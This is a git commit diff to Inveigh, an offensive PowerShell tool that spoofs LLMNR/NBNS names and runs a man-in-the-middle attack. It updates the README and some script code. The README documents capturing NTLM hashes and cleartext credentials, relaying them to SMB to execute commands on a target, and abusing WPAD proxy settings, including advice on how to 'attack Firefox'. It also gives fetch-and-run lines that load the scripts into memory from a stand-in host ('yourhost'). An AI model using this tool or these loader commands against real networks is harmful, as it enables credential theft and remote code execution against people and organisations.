diff options
| author | Kevin Robertson <robertsonk@gmail.com> | 2017-03-27 22:35:34 -0400 |
|---|---|---|
| committer | Kevin Robertson <robertsonk@gmail.com> | 2017-03-27 22:35:34 -0400 |
| commit | 5e0baa7b5fdd109d8c959205b3abc8dbbc5bdddb (patch) | |
| tree | f62826efce14b250fef229e6583ca4e1051e569e | |
| parent | 2bddbb9413aaad4c0e01c69f3d954f0d8e4cc707 (diff) | |
| download | Inveigh-5e0baa7b5fdd109d8c959205b3abc8dbbc5bdddb.tar.gz Inveigh-5e0baa7b5fdd109d8c959205b3abc8dbbc5bdddb.zip | |
bug fixes and partial readme update
| -rw-r--r-- | README.md | 153 | ||||
| -rw-r--r-- | Scripts/Inveigh-Relay.ps1 | 18 | ||||
| -rw-r--r-- | Scripts/Inveigh.ps1 | 37 |
3 files changed, 83 insertions, 125 deletions
@@ -4,7 +4,10 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design ## Included In * PowerShell Empire - https://github.com/PowerShellEmpire/Empire * PS>Attack - https://github.com/jaredhaight/psattack -* p0wnedShell - https://github.com/Cn33liz/p0wnedShell +* p0wnedShell - https://github.com/Cn33liz/p0wnedShell +* PowerUpSQL - https://github.com/NetSPI/PowerUpSQL +* PoshC2 - https://github.com/nettitude/PoshC2 +* pupy - https://github.com/n1nj4sec/pupy ## Special Thanks * Anyone that posted .NET packet sniffing examples. @@ -17,12 +20,10 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * To import using the dot source method: . ./Inveigh.ps1 - . ./Inveigh-BruteForce.ps1 . ./Inveigh-Relay.ps1 * To load into memory using Invoke-Expression: - IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") - IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Unprivileged.ps1") + IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh.ps1") IEX (New-Object Net.WebClient).DownloadString("http://yourhost/Inveigh-Relay.ps1") ## System Requirements @@ -30,7 +31,6 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design ## Functions * Invoke-Inveigh -* Invoke-InveighUnprivileged * Invoke-InveighRelay * Clear-Inveigh * Get-Inveigh @@ -40,9 +40,6 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design ### Invoke-Inveigh * The main Inveigh LLMNR/NBNS spoofer function. -##### Privilege Requirements: -* Elevated Administrator or SYSTEM - ##### Features: * IPv4 LLMNR/NBNS spoofer with granular control * NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS/SMB @@ -74,7 +71,8 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design  ##### Parameters: -* __IP__ - Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set. +* __ElevatedPrivilege__ - Default = Auto: (Auto,Y,N) Set the privilege mode. Auto will determine if Inveigh is running with elevated privilege. If so, options that require elevated privilege can be used. +* __IP__ - Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the 'SpooferIP' parameter is not set. * __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh host. * __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. Listed hostnames will override the whitelist created through SpooferLearning. * __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. @@ -89,26 +87,41 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer. * __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet. * __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name +* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. +* __NBNSBruteForceHost__ - Default = WPAD: Hostname for NBNS brute force spoofer. +* __NBNSBruteForcePause__ Default = Disabled: (Integer) Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received. * __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. +* __HTTPIP__ - Default = Any: IP address for the HTTP listener. +* __HTTPPort__ - Default = 80: TCP port for the HTTP listener. * __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. -* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server. +* __HTTPSPort__ - Default = 443: TCP port for the HTTPS listener. +* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. * __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. +* __HTTPContentType__ - Default = text/html: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse. * __HTTPDir__ - Full directory path to enable hosting of basic content through the HTTP/HTTPS listener. * __HTTPDefaultFile__ - Filename within the HTTPDir to serve as the default HTTP/HTTPS response file. This file will not be used for wpad.dat requests. * __HTTPDefaultEXE__ - EXE filename within the HTTPDir to serve as the default HTTP/HTTPS response for EXE requests. * __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. This parameter will not be used if HTTPDir is set. Use PowerShell character escapes where necessary. -* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate. -* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. -* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. -* __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse. +* __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the function does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. +* __HTTPSPort__ - Default = 443: TCP port for the HTTPS listener. +* __HTTPSCertIssuer__ - Default = Inveigh: The issuer field for the cert that will be installed for HTTPS. +* __HTTPSCertSubject__ - Default = localhost: The subject field for the cert that will be installed for HTTPS. +* __HTTPSForceCertDelete__ - Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. +* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM,NTLMNoESS) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. NTLMNoESS turns off the 'Extended Session Security' flag during negotiation. * __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. * __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. +* __WPADDirectFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse. * __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. * __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. +* __Proxy__ - Default = Disabled: (Y/N) Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures. +* __ProxyAuth__ - Default = NTLM: (Basic,NTLM,NTLMNoESS) Proxy server authentication type. +* __ProxyIP__ - Default = Any: IP address for the proxy listener. +* __ProxyPort__ - Default = 8492: TCP port for the proxy listener. +* __ProxyIgnore__ - Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening. * __SMB__ - Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to prevent login requests from being processed by the Inveigh host. * __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. * __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. +* __ConsoleOutput__ - Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. * __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. * __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. * __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. @@ -117,92 +130,15 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design * __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. * __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. * __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. +* __StartupChecks__ - Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup. +* __RunCount__ - Default = Unlimited: (Integer) Number of NTLMv1/NTLMv2 captures to perform before auto-exiting. * __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. * __Inspect__ - (Switch) Disable LLMNR, NBNS, HTTP, HTTPS, and SMB in order to only inspect LLMNR/NBNS traffic. * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire -### Invoke-InveighUnprivileged -* Inveigh LLMNR/NBNS spoofer function that does not require local administrator access. - -##### Privilege Requirements: -* Regular User - -##### Features: -* IPv4 NBNS spoofer with granular control that can be run with or without disabling the local NBNS service -* IPv4 LLMNR spoofer with granular control that can be run only with the local LLMNR service disabled -* Targeted IPv4 NBNS brute force spoofer with granular control -* NTLMv1/NTLMv2 challenge/response capture over HTTP -* Basic auth cleartext credential capture over HTTP -* WPAD server capable of hosting a basic or custom wpad.dat file -* HTTP server capable of hosting limited content -* Granular control of console and file output -* Run time control - -##### Notes: -* The local NBNS service does not need to be disabled on the host system. -* Ensure that any needed LMMNR, NBNS, HTTP ports are open within any local firewall on the host system. -* Migrating/injecting into a process that has already been allowed incoming/outgoing firewall access should also work. -* If you copy/paste challenge/response captures from the console window for password cracking, ensure that there are no extra carriage returns. -* Microsoft released patches in June 2016 that will likely prevent some of this function's brute force features from working the way they did before June. - -##### Examples: -* To execute with default settings: - Invoke-InveighUnprivileged - -* To execute with ConsoleOutput and FileOutput enabled and a run time of 30 minutes. - Invoke-InveighUnprivileged -ConsoleOutput Y -FileOutput Y -RunTime 30 - -##### Screenshot: - - -##### Parameters: -* __SpooferIP__ - IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to a system other than the Inveigh Unprivileged host. -* __SpooferTarget__ - IP address to target for brute force NBNS spoofing. -* __SpooferHostsReply__ - Default = All: Comma separated list of requested hostnames to respond to when spoofing with LLMNR and NBNS. -* __SpooferHostsIgnore__ - Default = All: Comma separated list of requested hostnames to ignore when spoofing with LLMNR and NBNS. -* __SpooferIPsReply__ - Default = All: Comma separated list of source IP addresses to respond to when spoofing with LLMNR and NBNS. -* __SpooferIPsIgnore__ - Default = All: Comma separated list of source IP addresses to ignore when spoofing with LLMNR and NBNS. -* __SpooferRepeat__ - Default = Enabled: (Y/N) Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured. -* __LLMNR__ - Default = Enabled: (Y/N) Enable/Disable LLMNR spoofer. -* __LLMNRTTL__ - Default = 30 Seconds: LLMNR TTL in seconds for the response packet. -* __NBNS__ - Default = Disabled: (Y/N) Enable/Disable NBNS spoofer. -* __NBNSTTL__ - Default = 165 Seconds: NBNS TTL in seconds for the response packet. -* __NBNSTypes__ - Default = 00,20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name -* __NBNSBruteForce__ - Default = Disabled: (Y/N) Enable/Disable NBNS brute force spoofer. -* __NBNSBruteForceHost__ - Default = WPAD: Hostname for NBNS brute force spoofer. -* __NBNSBruteForcePause__ Default = Disabled: (Integer) Time in seconds the NBNS brute force spoofer will stop spoofing after an incoming HTTP request is received. -* __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. -* __HTTPIP__ - Default = Any: IP address for the HTTP listener. -* __HTTPPort__ - Default = 80: TCP port for the HTTP listener. -* __HTTPAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type. This setting does not apply to wpad.dat requests. Note that Microsoft has changed the behavior of WDAP through NBNS in the June 2016patches. A WPAD enabled browser may now trigger NTLM authentication after sending out NBNS requests to random hostnames and connecting to the root of the web server. -* __HTTPBasicRealm__ - Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. Use PowerShell character escapes where necessary. -* __HTTPResponse__ - String or HTML to serve as the default HTTP/HTTPS response. This response will not be used for wpad.dat requests. -* __WPADAuth__ - Default = NTLM: (Anonymous,Basic,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. -* __WPADEmptyFile__ - Default = Enabled: (Y/N) Enable/Disable serving a proxyless, all direct, wpad.dat file for wpad.dat requests. Enabling this setting can reduce the amount of redundant wpad.dat requests. This parameter is ignored when using WPADIP, WPADPort, or WPADResponse. -* __WPADIP__ - Proxy server IP to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADPort. -* __WPADPort__ - Proxy server port to be included in a basic wpad.dat response for WPAD enabled browsers. This parameter must be used with WPADIP. -* __WPADDirectHosts__ - Comma separated list of hosts to list as direct in the wpad.dat file. Listed hosts will not be routed through the defined proxy. -* __WPADResponse__ - wpad.dat file contents to serve as the wpad.dat response. This parameter will not be used if WPADIP and WPADPort are set. Use PowerShell character escapes where necessary. -* __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. This will only be used for non-relay captures. -* __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. -* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. -* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. -* __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. -* __FileUnique__ - Default = Enabled: (Y/N) Enable/Disable outputting challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time file output is enabled. -* __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. -* __OutputStreamOnly__ - Default = Disabled: (Y/N) Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Brute Force through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. -* __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. -* __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. -* __RunCount__ - Default = Unlimited: (Integer) Number of captures to perform before auto-exiting. -* __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. -* __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire - ### Invoke-InveighRelay * The NTLMv2 HTTP/HTTPS to SMB relay command execution function. This function can be used with or without Invoke-Inveigh. -##### Privilege Requirements: -* Elevated Administrator or SYSTEM - ##### Features: * HTTP/HTTPS to SMB NTLMv2 relay with granular control * NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS @@ -221,25 +157,36 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design  ##### Parameters: +* __Command__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary. +* __Target__ - IP address of system to target for SMB relay. +* __Service__ - Default = 20 Character Random: Name of the service to create and delete on the target. * __HTTP__ - Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture. +* __HTTPIP__ - Default = Any: IP address for the HTTP/HTTPS listener. +* __HTTPPort__ - Default = 80: TCP port for the HTTP listener. * __HTTPS__ - Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443. If the script does not exit gracefully, execute "netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal" in the cert store. -* __HTTPSCertAppID__ - Valid application GUID for use with the ceriticate. -* __HTTPSCertThumbprint__ - Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current working directory and named Inveigh.pfx. +* __HTTPSCertIssuer__ - Default = Inveigh: The issuer field for the cert that will be installed for HTTPS. +* __HTTPSCertSubject__ - Default = localhost: The subject field for the cert that will be installed for HTTPS. +* __HTTPSForceCertDelete__ - Default = Disabled: (Y/N) Force deletion of an existing certificate that matches HTTPSCertIssuer and HTTPSCertSubject. * __Challenge__ - Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be pulled from the SMB relay target. * __MachineAccounts__ - Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. * __WPADAuth__ - Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to Anonymous can prevent browser login prompts. -* __SMBRelayTarget__ - IP address of system to target for SMB relay. -* __SMBRelayCommand__ - Command to execute on SMB relay target. Use PowerShell character escapes where necessary. -* __SMBRelayUsernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. -* __SMBRelayAutoDisable__ - Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. -* __SMBRelayNetworkTimeout__ - Default = No Timeout: (Integer) Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent. -* __ConsoleOutput__ - Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. +* __Proxy__ - Default = Disabled: (Y/N) Default = Disabled: (Y/N) Enable/Disable proxy server authentication captures. +* __ProxyIP__ - Default = Any: IP address for the proxy listener. +* __ProxyPort__ - Default = 8492: TCP port for the proxy listener. +* __ProxyIgnore__ - Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting -SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by closing and reopening. +* __Usernames__ - Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and domain\username format. +* __RelayAutoDisable__ - Default = Enable: (Y/N) Automaticaly disable SMB relay after a successful command execution on target. +* __RelayAutoExit__ - Default = Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error. +* __ConsoleOutput__ - Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. +* __ConsoleStatus__ - Default = Disabled: (Integer) Interval in minutes for displaying all unique captured hashes and credentials. This is useful for displaying full capture lists when running through a shell that does not have access to the support functions. +* __ConsoleUnique__ - Default = Enabled: (Y/N) Enable/Disable displaying challenge/response hashes for only unique IP, domain/hostname, and username combinations when real time console output is enabled. * __FileOutput__ - Default = Disabled: (Y/N) Enable/Disable real time file output. * __StatusOutput__ - Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages. * __OutputStreamOnly__ - Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the various yellow warning messages if enabled. * __OutputDir__ - Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be enabled. * __ShowHelp__ - Default = Enabled: (Y/N) Enable/Disable the help messages at startup. * __RunTime__ - Default = Unlimited: (Integer) Run time duration in minutes. +* __SMB1__ - (Switch) Force SMB1. The default behavior is to perform SMB version negotiation and use SMB2 if supported by the target. * __Tool__ - Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Metasploit's Interactive Powershell Sessions and Empire. 0 = None, 1 = Metasploit, 2 = Empire ##### Notes: @@ -248,7 +195,7 @@ Inveigh is a Windows PowerShell LLMNR/NBNS spoofer/man-in-the-middle tool design ### Support Functions * __Clear-Inveigh__ - Clear Inveigh data from memory -* __Get-Inveigh__ - Get Inveigh data from memory - Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames +* __Get-Inveigh__ - Get Inveigh data from memory - Parameters: Console, ClearText, CleartextUnique, Learning, Log, NTLMv1, NTLMv1Unique, NTLMv1Usernames, NTLMv2, NTLMv2Unique, NTLMv2Usernames, POSTRequest, POSTRequestUnique * __Stop-Inveigh__ - Stop all running Inveigh functions * __Watch-Inveigh__ - Enable real time console output diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1 index e2ed0bb..983ac0c 100644 --- a/Scripts/Inveigh-Relay.ps1 +++ b/Scripts/Inveigh-Relay.ps1 @@ -90,7 +90,7 @@ target. Default = Enable: (Y/N) Enable/Disable automaticaly exiting after a relay is disabled due to success or error. .PARAMETER ConsoleOutput -Default = Disabled: (N,Y,Medium,Low) Enable/Disable real time console output. If using this option through a shell, test to +Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. .PARAMETER ConsoleStatus @@ -164,7 +164,7 @@ param [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0", [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "", [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0", - [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "", + [parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "0.0.0.0", [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "", [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox", [parameter(Mandatory=$false)][Array]$Usernames = "", @@ -188,9 +188,9 @@ if ($invalid_parameter) throw } -if(!$ProxyIP) +if($ProxyIP -eq '0.0.0.0') { - $ProxyIP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) + $proxy_WPAD_IP = (Test-Connection 127.0.0.1 -count 1 | Select-Object -ExpandProperty Ipv4Address) } if(!$OutputDir) @@ -492,7 +492,7 @@ if($Proxy -eq 'Y') { $inveigh.status_queue.Add("Proxy Capture/Relay = Enabled") > $null $ProxyPortFailover = $ProxyPort + 1 - $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $ProxyIP`:$ProxyPort; PROXY $ProxyIP`:$ProxyPortFailover; DIRECT`";}" + $WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $proxy_WPAD_IP`:$ProxyPort; PROXY $proxy_WPAD_IP`:$ProxyPortFailover; DIRECT`";}" $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()}) if($ProxyIgnore.Count -gt 0) @@ -1813,8 +1813,8 @@ $SMB_relay_response_scriptblock = } elseif([System.BitConverter]::ToString($SMB_client_receive[108..111]) -eq '05-00-00-00') { - $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")]) + $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")]) $SMB_relay_failed = $true } else @@ -2249,8 +2249,8 @@ $SMB_relay_response_scriptblock = } elseif([System.BitConverter]::ToString($SMB_client_receive[128..131]) -eq '05-00-00-00') { - $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator on $Target")]) + $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target") + $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string is not a local administrator or does not have required privilege on $Target")]) $SMB_relay_failed = $true } else diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1 index 0442f54..51b7d84 100644 --- a/Scripts/Inveigh.ps1 +++ b/Scripts/Inveigh.ps1 @@ -103,7 +103,7 @@ wpad.dat requests. NTLMNoESS turns off the 'Extended Session Security' flag duri Realm name for Basic authentication. This parameter applies to both HTTPAuth and WPADAuth. .PARAMETER HTTPContentType -Default = none: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" +Default = text/html: Content type for HTTP/HTTPS responses. Does not apply to EXEs and wpad.dat. Set to "application/hta" for HTA files or when using HTA code with HTTPResponse. .PARAMETER HTTPDir @@ -195,7 +195,7 @@ challenge will be generated for each request. Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts. .PARAMETER ConsoleOutput -Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to +Default = Disabled: (Low,Medium,Y,N) Enable/Disable real time console output. If using this option through a shell, test to ensure that it doesn't hang the shell. Medium and Low can be used to reduce output. .PARAMETER ConsoleStatus @@ -535,6 +535,7 @@ if(!$elevated_privilege) } +$inveigh.hostname_spoof = $false $inveigh.running = $true if($StatusOutput -eq 'Y') @@ -945,6 +946,10 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y') { $proxy_WPAD_IP = $IP } + else + { + $proxy_WPAD_IP = $ProxyIP + } if($WPADIP -and $WPADPort) { @@ -1330,7 +1335,7 @@ $SMB_NTLM_functions_scriptblock = # HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener $HTTP_scriptblock = { - param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse) + param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$NBNSBruteForcePause,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse) function NTLMChallengeBase64 { @@ -1576,8 +1581,8 @@ $HTTP_scriptblock = if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$HTTP_header_user_agent.contains($_)})) { - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP") - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")]) + $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP") + 